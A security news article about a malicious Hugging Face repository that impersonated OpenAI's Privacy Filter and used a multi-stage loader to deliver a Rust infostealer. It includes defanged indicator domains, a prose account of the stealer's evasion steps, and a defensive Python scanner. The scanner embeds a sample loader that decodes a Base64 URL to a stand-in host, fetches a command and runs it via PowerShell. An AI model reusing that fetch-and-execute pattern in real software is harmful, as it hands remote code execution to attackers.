
Hugging Face Malicious Model Impersonates OpenAI to Steal Data

Updated on May 11, 2026

A malicious repository on Hugging Face ranked #1 on the platform by impersonating OpenAI's just-released Privacy Filter model while delivering a Rust-based information stealer to Windows users.

The Hugging Face malicious model was named Open-OSS/privacy-filter and copied the legitimate OpenAI openai/privacy-filter repository description verbatim in order to trick unsuspecting users into downloading it. Hugging Face has now disabled access to the malicious project.

OpenAI's Privacy Filter was announced in April 2026 as a way of detecting and redacting personally identifiable information (PII) from unstructured text; the legitimate model helps developers build applications with strong privacy and security protections. The Hugging Face malicious model was created for a very different purpose.

How the Impersonation Worked

The Hugging Face malicious model relied on typosquatting: the attackers chose a namespace that closely resembles a legitimate one (Open-OSS instead of openai) and reused the exact project name (privacy-filter).

The attackers copied the entire description from OpenAI's legitimate model card nearly verbatim, so anyone skimming the repository would see the same text they expected from the official release, and the Hugging Face malicious model looked trustworthy at first glance.

The repository instructed users to clone it and run a batch script called start.bat on Windows or a Python script called loader.py on Linux or macOS. These scripts were presented as setting up dependencies and starting the model, but they did something much worse.

Multi-Stage Infection Chain

The attackers used an elaborate multi-stage infection chain to deliver the payload.

Stage 1: Loader Script: The loader.py Python script was the first code to run on the victim's machine. It disabled SSL certificate verification, decoded a Base64-encoded URL pointing at a paste service called JSON Keeper, and retrieved from that location the current command to execute via PowerShell.

Using JSON Keeper as a dead-drop resolver was a clever choice: it allowed the attackers to change their payload URLs at any time without touching the repository, which made the campaign harder to track.

Stage 2: PowerShell Downloader: The PowerShell command downloaded a batch file from a separate host, api.eth-fastscan[.]org, and executed it with cmd.exe.

Stage 3: UAC Bypass and Defender Exclusions: The batch script acted as a downloader that prepared the environment for the next stage. It attempted UAC elevation (triggering the UAC prompt), added Microsoft Defender Antivirus exclusions so the malware would not be detected, downloaded the next-stage binary from the same domain, and created a scheduled task that launched a PowerShell script to execute the downloaded executable.

Stage 4: Information Stealer: The scheduled task launched the malware, waited two seconds, and then deleted itself to cover its tracks. This final stage was a Rust-based information stealer that collected sensitive data (such as banking credentials) stored on the infected system.

What the Stealer Targeted

The Hugging Face malicious model infostealer was designed to extract a wide range of valuable data from infected Windows machines:
1. Screenshots of the desktop, to see what the user was doing.
2. Discord tokens, which allow an attacker to take over the victim's Discord account without the password.
3. Cryptocurrency wallet browser extensions and documents that would give an attacker access to the victims' wallets.
4. FileZilla client configuration files (.filezilla.xml), which store FTP credentials for the victims' websites.
5. Seed phrases from cryptocurrency wallets, which give direct access to the funds.
6. Browser data (saved passwords, cookies and history) from Google Chrome, Microsoft Edge, Brave, Firefox and other Chromium-based or Gecko-based browsers.
7. System metadata, aggregated to give the attacker an understanding of the victim's environment.

Evasion Methods

The Hugging Face model stealer contained multiple methods to evade detection.

The malware checked for the presence of a debugger, a sandbox or a virtual machine environment and changed its behavior when one was detected.

The stealer also tried to disable the Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW), two key security features that help Windows detect and block malicious scripts. In addition, the infection chain configured Microsoft Defender exclusions early on, so the antivirus software would ignore the malicious files.

Despite using a scheduled task, the malware established no persistence: the task was deleted before any reboot, and HiddenLayer explained that it served as a one-shot SYSTEM-context launcher rather than a long-term backdoor.

Trending List Manipulation

Within 18 hours of being released on the platform, the malicious model reached the number one spot in trending models (around 244K downloads, 667 likes). These statistics were almost certainly inflated through some form of automation or bots, creating an illusion of trust and popularity designed to convince real users that the model was legitimate.

Anyone browsing the trending list saw this repository at the top, with hundreds of thousands of downloads and hundreds of likes, and assumed it was safe because so many other people had apparently already used it.

Six More Malicious Repositories

Further analysis of the Hugging Face malicious model campaign uncovered six more repositories using a similar Python loader to deploy the same infostealer.

These repositories were published under the user account anthfu and included names like:
anthfu/Bonsai-8B-gguf
anthfu/Qwen3.6-35B-A3B-APEX-GGUF
anthfu/DeepSeek-V4-Pro
anthfu/Qwopus-GLM-18B-Merged-GGUF
anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF
anthfu/supergemma4-26b-uncensored-gguf-v2

All of these Hugging Face malicious model repositories used the same technique of impersonating popular or trending model names to attract downloads.

Connection to ValleyRAT and Silver Fox

The Hugging Face malicious model campaign shares infrastructure with a previous attack that delivered ValleyRAT (also known as Winos 4.0), a modular remote access trojan attributed to a Chinese hacking group called Silver Fox.

HiddenLayer observed that the domain api.eth-fastscan[.]org was also used to serve a different Windows executable (o0q2l47f.exe) that beacons out to welovechinatown[.]info, and this second domain was previously used in a campaign that leveraged a malicious npm package named trevlo to deliver ValleyRAT.

That npm campaign used a postinstall hook to silently execute an obfuscated JavaScript loader, which spawned a Base64-encoded PowerShell command, fetched and executed a second-stage PowerShell script, and finally downloaded and ran a Winos 4.0 stager binary.

HiddenLayer concluded that the shared infrastructure suggests these campaigns are possibly linked and likely part of a broader supply chain operation targeting open-source ecosystems, meaning the Hugging Face malicious model may be just one piece of a larger attack campaign.

The Silver Fox Connection

Silver Fox is a Chinese hacking group that has been active for several years, and the group is known for targeting organizations in Russia, India, and other Asia-Pacific countries with tax-themed phishing emails and sophisticated malware.

ValleyRAT (Winos 4.0) is the group's signature backdoor and has been used in countless attacks; the Hugging Face malicious model campaign represents a new initial access vector for this same malware family.

Instead of sending phishing emails or poisoning search results, the attackers simply uploaded a malicious model to Hugging Face, manipulated the trending list, and waited for victims to come to them.

How to Protect Yourself

The Hugging Face malicious model has been disabled, but similar attacks will appear again.
1. Verify repository ownership. Before downloading any model from Hugging Face, check the author's username against the official organization. OpenAI's official models come from openai, not Open-OSS, and this simple check would have revealed the malicious model as fake.

2. Do not run random scripts. The malicious model required users to manually run start.bat or loader.py. No legitimate model should require you to execute batch scripts or Python loaders; the official Privacy Filter model does not ask this.

3. Treat download counts with skepticism. The malicious model had inflated download and like counts, and attackers can purchase or operate bots to inflate these metrics, so popularity should never be the deciding factor in whether a model is safe.

4. Review code before executing it. If a model asks you to run a script, open that script in a text editor first. The malicious model's loader.py contained encoded PowerShell commands that were clearly suspicious.

5. Use security software. The infostealer attempted to disable AMSI and ETW, but modern endpoint detection tools can still catch these behaviors. Keep your security software updated.
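To make steps 1, 2 and 4 concrete, here is an added example (written for this article, not code from HiddenLayer or Hugging Face) that performs a pre-download review of a model repository: it checks the namespace against an assumed allow-list of official publishers and statically scans bundled scripts for the loader traits described in Stage 1 (SSL verification disabled, a Base64-decoded URL, a PowerShell hand-off). The allow-list and the sample loader are constructed for the demo.

```python
"""Heuristic pre-download review of a Hugging Face model repository."""
import re

# Assumption: a small defender-maintained map of model name -> official
# namespaces. This is not a Hugging Face API; extend it for your own needs.
OFFICIAL_NAMESPACES = {"privacy-filter": {"openai"}}

# Indicators matching the loader behaviour described in the article.
LOADER_INDICATORS = {
    "ssl_verification_disabled": re.compile(r"_create_unverified_context|verify\s*=\s*False"),
    "base64_decode": re.compile(r"b64decode|FromBase64String", re.I),
    "powershell_handoff": re.compile(r"powershell(\.exe)?|-EncodedCommand", re.I),
    "shell_spawn": re.compile(r"subprocess\.(Popen|run|call)|os\.system"),
}

def namespace_findings(repo_id: str) -> list[str]:
    """Flag a repo whose namespace is not the official publisher of that model name."""
    namespace, _, name = repo_id.partition("/")
    expected = OFFICIAL_NAMESPACES.get(name.lower())
    if expected and namespace.lower() not in expected:
        return [f"namespace '{namespace}' is not the official publisher of "
                f"'{name}' (expected {sorted(expected)})"]
    return []

def script_findings(filename: str, content: str) -> list[str]:
    """Flag Windows scripts outright and report each loader indicator found."""
    findings = []
    if filename.lower().endswith((".bat", ".cmd", ".ps1")):
        findings.append(f"{filename}: model repo ships a Windows script")
    for label, pattern in LOADER_INDICATORS.items():
        if pattern.search(content):
            findings.append(f"{filename}: {label}")
    return findings

def assess_repo(repo_id: str, files: dict[str, str]) -> list[str]:
    """Combine namespace and per-file findings; an empty list means nothing flagged."""
    findings = namespace_findings(repo_id)
    for filename, content in files.items():
        findings.extend(script_findings(filename, content))
    return findings

# Constructed sample shaped like the described loader (not the real file).
SAMPLE_LOADER = '''
import ssl, base64, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context
url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv").decode()  # https://example.invalid/
cmd = urllib.request.urlopen(url).read().decode()
subprocess.run(["powershell", "-Command", cmd])
'''

if __name__ == "__main__":
    for f in assess_repo("Open-OSS/privacy-filter", {"loader.py": SAMPLE_LOADER, "start.bat": "@echo off"}):
        print("FLAG:", f)
```

Any non-empty result is a reason to stop and read the repository by hand rather than run what it ships.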

Final Thoughts

The Hugging Face malicious model campaign succeeded because it exploited trust in two ways: users trusted the Hugging Face platform itself, and they trusted the trending algorithm to surface safe, popular content.

The attackers manipulated both. They created a convincing impersonation of OpenAI's model, copied the description verbatim, inflated download and like counts, and waited for victims to willingly infect themselves.

The malicious model reached #1 trending within 18 hours, and 244,000 downloads occurred before Hugging Face disabled it. Each of those downloads represents a potential compromise.

Hugging Face has removed this specific malicious model, but the anthfu account published six more repositories, and other attackers will copy this technique. Always verify the source, never run random scripts, and remember that popularity on Hugging Face does not guarantee safety.

FAQ Section

What was the Hugging Face malicious model pretending to be?

The Hugging Face malicious model impersonated OpenAI's Privacy Filter model, which was released in April 2026. The attackers used the name Open-OSS/privacy-filter instead of openai/privacy-filter and copied the entire description verbatim to trick users.

What is the total number of downloads of the malicious Hugging Face model?

The Hugging Face malicious model recorded around 244,000 downloads (and 667 likes) during its first 18 hours on the platform and reached #1 trending, but these numbers were very likely manipulated by the attackers.

What type of malware was delivered through the Hugging Face malicious model? 

The Hugging Face malicious model delivered a Rust-based information-stealer that collected Discord tokens, crypto wallets and wallet extensions, FileZilla configuration files, wallet seed phrases, browser data from both Chromium-based and Gecko-based browsers, screenshots, as well as system metadata.

Are the recent Hugging Face attacks linked with Silver Fox and/or ValleyRAT?

Yes. The infrastructure identified in this malicious model campaign on Hugging Face (api.eth-fastscan[.]org & welovechinatown[.]info) was previously utilized for the delivery of ValleyRAT (Winos 4.0) – a backdoor exclusively attributed to the Chinese cyber crime syndicate, Silver Fox.

What can you do to prevent downloading fake models from Hugging Face?

Ensure that the repository owner's username matches that of the well-known organization (check its official page), audit any script before executing it, examine the repository name for signs of typosquatting, and don't assume that a large download count means a model is safe. Attackers often manipulate download counts.

Source: The Hacker News